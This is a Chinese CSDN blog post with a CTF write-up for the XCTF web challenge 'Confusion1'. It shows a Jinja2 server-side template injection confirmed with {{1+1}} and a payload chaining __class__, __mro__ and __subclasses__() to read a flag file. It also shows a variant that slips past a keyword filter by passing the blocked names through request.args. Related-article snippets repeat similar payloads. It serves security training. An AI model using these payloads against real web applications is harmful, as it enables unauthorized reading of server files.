攻防世界 web confusion1

最新推荐文章于 2024-04-09 16:45:15 发布
最新推荐文章于 2024-04-09 16:45:15 发布
阅读量158 收藏
点赞数
分类专栏: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beihai2013/article/details/112789611
版权

Confusion1

考察:SSTI

参考

https://www.cnblogs.com/zhengna/p/13964561.html

进入网页,发现除了主页面,login和register都登不进去。

显示apache2.4.10,查询是否有相关可利用漏洞,失败。

根据wp,login.php和register.php下均有提示flag位置(!!!一定要查看源码,不能访问的页面也要查看

在URL上测试

http://220.249.52.134:45205/index.php/{{ 1+1}}

返回2,说明可以SSTI注入

尝试

''.__class__.__mro__[2].__subclasses__()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read()

不能得到结果,说明有绕过

新姿势,通过request传参进行绕过

http://220.249.52.134:45205/index.php/{{ ''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

cyberpeace{386fd2a442e4b6841a294c2f66c864a8}

SSTI新姿势

{{ ''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
# 注意,字符之间的连接点没了,以及括号()和下标[]需要放在里面
beihai2013
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 7分题Confusion1
闵行小鱼塘
10-11 2856
继续ctf的旅程,开始攻防世界web高手进阶区的7分题,本文是Confusion1的writeup
攻防世界WebConfusion1
Light_inthe_eyes的博客
10-17 194
打开页面,看见一张图片,点击Home、Login、Register都没用: 看看源代码,在Register.php中发现一点提示: 但没什么思路,去网上看了看WP,觉得这道题的提示就很扯,那张图片提示了是SSTI?!就因为图片是蛇吞象意味着python干掉php?!想了想,是我还不够头脑风暴,那就按着这个思路往下做吧,简单测试一下: payload:{{''.__class__.__mro__[2].__subclasses__()}},发现不行,也许是过滤了某些字符吧: 但没有过滤request,re
攻防世界 Confusion1
CyhDl666的博客
02-26 278
进入页面 index.php页面查看了源码,没有什么发现 进入Login.php页面 返回404??? 查看一下源码 从这里看可能是个SSTI模板注入 这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入 按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是 从这里来看应该是存在一个过滤 想到做过的SSTI题目 shrine用的是url_for函数 尝试一下 ...
攻防世界Confusion1
qq_43774856的博客
12-09 777
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
攻防世界 WEB Confusion1
qq_41696858的博客
08-26 168
这题其实跟php没关系,不要被hint给骗了,扫一波目录,就知道其实是用python开发的 emmm。。。找了一圈,没发现有什么有用的东西,看目录结构,盲猜是flask 既然是flask,之前做了好多SSTI,那么就试试,果然 {{7*7}}回显49,确实存在ssti 这题的主要考点其实是过SSTI的过滤,经测试,直接''.__class__被过滤了 需要换成{{''[request.args.a]}}?a=__class__其实就跟sql预处理差不多,做一个占位符,然后执行的时候通过参数具体赋值 既然找到
攻防世界Confusion1
wangzhemvp的博客
04-09 529
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。php的标志是大象,Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显,ssti。过滤了关键字,并未过滤request。点进register.php。
攻防世界web进阶区 Confusion1
akxnxbshai的博客
01-24 3601
攻防世界web进阶区 Confusion1 难度系数: 四星 题目来源: XCTF 4th-QCTF-2018 题目描述:某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器) 题目提到了php,打开网址首先看到一张图 蛇缠在大象身上猜测此系统使用了php+python (php的标志是大象,Python的标志是蛇) 然后进入了注册页面发现flag的位置 想到了本题可能存在Python ..
攻防世界 web高手进阶区 10分题Confusion2
闵行小鱼塘
10-13 1053
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Confusion2的writeup
xctf攻防世界 Web高手进阶区 Confusion1
l8947943的博客
12-30 1787
1. 直接进入场景,查看环境 2. 分析 映入眼帘的是神马奇葩玩意? 思考了一下,蟒蛇(Python)?大象(ElePHPant)?两个扭扯想说明啥?。。不懂 打开控制台,看看有没有提示 戳一戳链接,发现longin页面和register页面都有如下信息 emmm,按时flag的位置? blue-whale是什么破玩意? 点完后更加懵逼了,大胆猜测,需要审计源码,那么尝试.git漏洞,看能不能搞到源码,如图 得,没戏,看看robots.txt同样的显示,说明不能看到源码。 如何访问到提示的flag内
Edge Type Confusion利用1
08-03
JavaScript中的数组在解析引擎中的实现方式对于理解"Edge Type Confusion利用1"至关重要。JavaScript是一种弱类型语言,这意味着数组可以存储不同类型的数据,如数字、字符串、对象等。然而,在底层,这种灵活性带来...
confusion-react:React Web应用程序
04-07
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
conFusion:前端Web UI框架引导项目
03-08
"conFusion:前端Web UI框架引导项目"是一个专门针对前端Web开发的用户界面框架,旨在帮助开发者构建优雅、响应式且易于维护的网站。这个项目可能是由一系列HTML、CSS和JavaScript文件组成的,用于实现现代网页设计的...
ConFusion
03-19
在网页开发的世界里,HTML(HyperText Markup Language)无疑是构建网页结构的基础。本文将深入探讨HTML技术,并结合名为"ConFusion"的项目,揭示HTML在实际应用中的重要性和技巧。 "ConFusion"项目可能是对一个...
confusion_matrix1.zip_confusion_matrix1_matlab混淆矩阵_混淆矩阵_混淆矩阵matl
07-15
标题中的"confusion_matrix1.zip_confusion_matrix1_matlab混淆矩阵_混淆矩阵_混淆矩阵matlab 画混淆矩阵"表明这是一个使用MATLAB编写的程序,用于绘制和理解混淆矩阵。MATLAB是一种广泛使用的数值计算和数据可视化...
大学物理-章节PPT!
最新发布
07-22
大学物理-章节PPT!
将当前路径下的doc或者docx转化为doc/docx
07-22
将该脚本放在要转化doc/docx的路径下,执行
量子位:2023 AIGC算力全景与趋势报告(1).pdf
07-22
量子位:2023 AIGC算力全景与趋势报告(1).pdf
无水印视频素材,可以用于剪辑,制作PPT等办公场景,烟花系列6个,冬季系列4个,日落黄昏4个,山水系列9个等等
07-22
您正在寻找一系列专业级的视频素材,这些素材不仅无水印,而且适用于各种创意工作,包括视频剪辑和PPT制作。我们精心策划并提供了一系列精选的视频素材,旨在满足您在不同办公场景下的需求。 烟花系列:6个独特的视频片段,捕捉了烟花绽放的瞬间,无论是庆祝活动还是节日庆典,这些素材都能增添光彩。 车流系列:1个动态的车流视频,展现城市夜晚的活力,适合用作背景或过渡效果,营造现代都市感。 城市系列:1个展示城市天际线的视频,适合作为商业演示或旅行宣传片的背景,传递都市生活的节奏。 创意系列:1个富有创意的视频,适合激发灵感,适用于广告或个人项目,增加作品的原创性。 倒计时系列:1个倒计时视频,适用于正式场合或倒计时活动,简洁明了地传达时间流逝的紧迫感。 冬季系列:4个冬季主题的视频,涵盖雪景、冰晶等元素,适合季节性主题的创作。 科技系列:1个科技感强烈的视频,适合科技公司的宣传材料或未来主义风格的项目。 日落黄昏系列:4个日落时分的宁静画面,适合创造浪漫或怀旧氛围的视觉叙事。 山水系列:9个自然风光视频,包括山脉、湖泊和瀑布等壮丽景色,适合环境保护主题或自然美景展示 这些素材均经过精心挑选,确保高品
Confusion matrix
04-01
A confusion matrix is a table used to evaluate the performance of a classification model. It summarizes the predicted and actual classifications of a dataset and provides a breakdown of the number of true positives, true negatives, false positives, and false negatives. The matrix is often used to calculate metrics such as accuracy, precision, recall, and F1 score, which help determine the model's effectiveness. The confusion matrix is a useful tool for analyzing the performance of various machine learning algorithms and making decisions about model improvements.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值